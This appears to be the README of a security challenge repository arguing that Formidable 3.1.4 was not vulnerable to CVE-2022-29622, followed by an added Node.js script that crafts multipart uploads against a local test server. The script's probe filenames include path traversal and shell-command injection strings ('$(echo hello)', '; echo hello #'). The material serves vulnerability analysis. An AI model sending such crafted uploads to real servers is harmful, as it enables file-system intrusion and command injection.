
keymandll/CVE-2022-29622


CVE-2022-29622: (In)vulnerability Analysis

This codebase was created to help security professionals and developers understand why I think Formidable was not vulnerable to CVE-2022-29622. I have written up my analysis here: CVE-2022-29622: (In)vulnerability Analysis

Since some readers did not follow the argument, I decided to illustrate my point with actual, running code.

The Server

The server is implemented in index.mjs. It uses Formidable version 3.1.4 to upload any file of your choosing.

I explicitly configured Formidable as shown below:

{
  uploadDir: './uploads/',
  keepExtensions: true,
}

This way, all files will be uploaded to the uploads directory. I have enabled keepExtensions so that the extension of the (malicious) filename you supply is preserved on the uploaded file.

Starting the Server

To set up and start the server, issue the following commands from this directory:

npm install
npm run start

The first command installs all dependencies, including the appropriate version of formidable. The second command will start the server.

Once up and running, you can access the file upload form exposed by the server at: http://127.0.0.1:3000/

Upload a Malicious File

I have included two example files with malicious names in the examples directory.

Files submitted using the form at http://127.0.0.1:3000 will get uploaded to the uploads directory.

CHALLENGE

The challenge is to see if you can prove that formidable is vulnerable to CVE-2022-29622. To do that, you have to get this web server to execute code that you include in the uploaded file or in the name of the file.

The rules:

  1. You are allowed to put your malicious payload in the file or within the file's name. (Similar to the examples I have provided.)
  2. You are allowed to tamper with parts of the HTTP request that are related to file upload. (e.g.: multipart body, content-type, boundary string)
  3. The only acceptable attack surface is port 3000. You MUST NOT modify any files within this directory.

Only if you can get arbitrary code executed while strictly following the above rules have you proved that formidable was vulnerable to arbitrary code execution.

Suggestion: probably the simplest visual demonstration would be to get the server to print out a string, for example "I'm awesome, I've got arbitrary code executed", on the console where you started the web server.
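A browser-submitted form is a poor tool for this challenge: the browser strips any directory component from the filename and percent-encodes quotes and line breaks before the request leaves the machine. To exercise rules 1 and 2 you want to build the multipart/form-data request yourself, so that every byte of the crafted filename reaches port 3000 unchanged. The script below is an added example and is not part of this repository or of Formidable; it assumes the upload form's file field is named "file" and that it posts to "/" on http://127.0.0.1:3000 (neither is stated above; check index.mjs and adjust). The probe filenames are constructed illustrations of what a tester might try, not payloads the page claims to work. It needs no dependencies beyond Node 18+ (global fetch and Buffer).

```javascript
// Added example (not part of keymandll/CVE-2022-29622): hand-build a
// multipart/form-data upload with an arbitrary filename and optionally
// send it to the challenge server.
//
// Assumptions not stated on the page: the file input is named "file" and
// the form posts to "/" on the challenge port.
const TARGET_URL = 'http://127.0.0.1:3000/'; // assumed upload endpoint
const FIELD_NAME = 'file';                   // assumed <input name="...">

// Builds the raw multipart body. The filename is copied verbatim: no
// basename(), no character filtering. CR, LF and '"' are rejected because
// they break the part-header framing itself rather than reaching whatever
// the server does with the name; edit the template if you want to probe that.
function buildMultipart(fieldName, filename, content, boundary = 'probe' + Math.random().toString(16).slice(2)) {
  if (/[\r\n"]/.test(filename)) {
    throw new Error('filename would break the Content-Disposition header');
  }
  const head =
    `--${boundary}\r\n` +
    `Content-Disposition: form-data; name="${fieldName}"; filename="${filename}"\r\n` +
    `Content-Type: application/octet-stream\r\n\r\n`;
  const tail = `\r\n--${boundary}--\r\n`;
  const body = Buffer.concat([
    Buffer.from(head, 'latin1'),
    Buffer.isBuffer(content) ? content : Buffer.from(content),
    Buffer.from(tail, 'latin1'),
  ]);
  return { body, boundary, contentType: `multipart/form-data; boundary=${boundary}` };
}

// Minimal read-back of the first part's filename parameter, i.e. what a
// server-side parser sees before it decides how to store the file. Used here
// to confirm the crafted name survives the encoding step intact.
function extractFilename(body, boundary) {
  const text = body.toString('latin1');
  const start = text.indexOf(`--${boundary}\r\n`);
  if (start !== 0) return null;
  const headerEnd = text.indexOf('\r\n\r\n', start);
  if (headerEnd === -1) return null;
  const headers = text.slice(start, headerEnd);
  const m = /filename="([^"]*)"/.exec(headers);
  return m ? m[1] : null;
}

// POSTs one crafted upload; resolves with the server's status and body text.
async function sendUpload(filename, content) {
  const { body, contentType } = buildMultipart(FIELD_NAME, filename, content);
  const res = await fetch(TARGET_URL, {
    method: 'POST',
    headers: { 'Content-Type': contentType },
    body,
  });
  return { status: res.status, text: await res.text() };
}

// Constructed probe names (illustrative only): a path traversal attempt and
// two shell-metacharacter names. Each is built locally and checked to show
// that the name is transmitted byte-for-byte; run with --send to post them.
const PROBES = [
  '../../../tmp/traversal.txt',
  '$(echo hello).txt',
  '; echo hello #.txt',
];

if (process.argv.includes('--send')) {
  (async () => {
    for (const name of PROBES) {
      const r = await sendUpload(name, 'console.log("payload body")\n');
      console.log(`${JSON.stringify(name)} -> HTTP ${r.status}`);
    }
  })().catch((err) => console.error(err));
}
```

Run it as `node probe.js --send` while the challenge server is up, then look in the uploads directory (and at the server console) to see what name the file was actually stored under; the difference between the name you sent and the name on disk is the whole question the challenge is about.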

About

Hack this service to prove CVE-2022-29622 is valid
